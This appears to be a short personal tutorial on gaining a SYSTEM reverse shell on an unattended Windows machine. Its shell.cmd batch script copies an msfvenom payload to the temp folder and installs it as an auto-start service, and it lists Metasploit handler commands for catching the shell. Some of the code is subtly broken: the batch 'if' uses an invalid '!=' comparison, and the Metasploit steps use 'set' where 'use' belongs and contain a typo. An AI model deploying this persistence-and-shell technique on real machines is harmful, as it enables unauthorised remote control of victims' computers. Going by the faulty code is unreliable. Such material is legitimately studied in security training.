Reverse shell

In this section, I aim to experiment and provide a simple example of a "malware" that can be executed as an Administrator account on a target's Windows machine. For simplicity, I assume the weakest security scenario:

a. User is in the Administrators group on the machine

b. User left the machine unattended while being logged in

c. There is no anti-virus solutions (besides Windows defender) running on the machine

The "malware" will simply provide a remote shell as the SYSTEM user.

Note: the setup and techniques used in this example is EXTREMELY minimal, and OPSEC is not taken into account.

Setup

The following outlines the root directory of the "malware" folder

1. rvshell.exe

• Generated with msfvenom: meterpreter or reverse shell

1. shell.cmd

• To be executed as administrators

  • GUI: Right-click -> "Run as administrator"

shell.cmd

REM Executes a C# script that returns a boolean value that indicates if the current user is in the "Adminstrators" group, before storing the value in the "ISADMIN" env variable
for /f "delims=" %%a in ('powershell.exe -NoProfile -Command "([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)"') do set ISADMIN=%%a

REM Echo the value of the "ISADMIN" env variable (for debugging purposes)
echo ISADMIN=%ISADMIN%

REM User is not an administrator: EXIT
if /i "%ISADMIN%"!="True" (
    echo User is NOT an administrator
    exit
    )

REM User is an administrator: continue next step
set RVSHELL_EXE=%TEMP%\rvshell.exe

REM Copy reverse shell payload to a temp folder
copy /y rvshell.exe %RVSHELL_EXE%

REM Create and start a service with sc.exe

sc.exe create "rvshell" binPath= "%RVSHELL_EXE%" start= auto
sc.exe start "rvshell"

REM EXIT current prompt
exit

a. ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)

• A C# one-liner which output a boolean value that indicates if the current user is in the "Administrators" group

After executing the shell.cmd file: Right-click -> "Run as administrator", we will be prompted to allow administrative permissions to run the script, to which we can simply accept to proceed.

Notice that we are not required to authenticate (provide password or any other credentials), as our currently logged in user is an administrator (in the "Administrators" group).

Catch the shell

Attacker machine

$ msfconsole
msf6> set exploit/multi/handler

# set payload accordingly
msf6> set payload windows/x64/meterpreter/reverse_tcp
msf6> set payload windows/x64/powershell_reverse_tcp

msf6> set lhost <lhsot>
msf6> set lport <lport>
msf6> run

Resources

1. Powershell.exe

about_PowerShell_exe - PowerShellMicrosoftLearn

1. set command

setMicrosoftLearn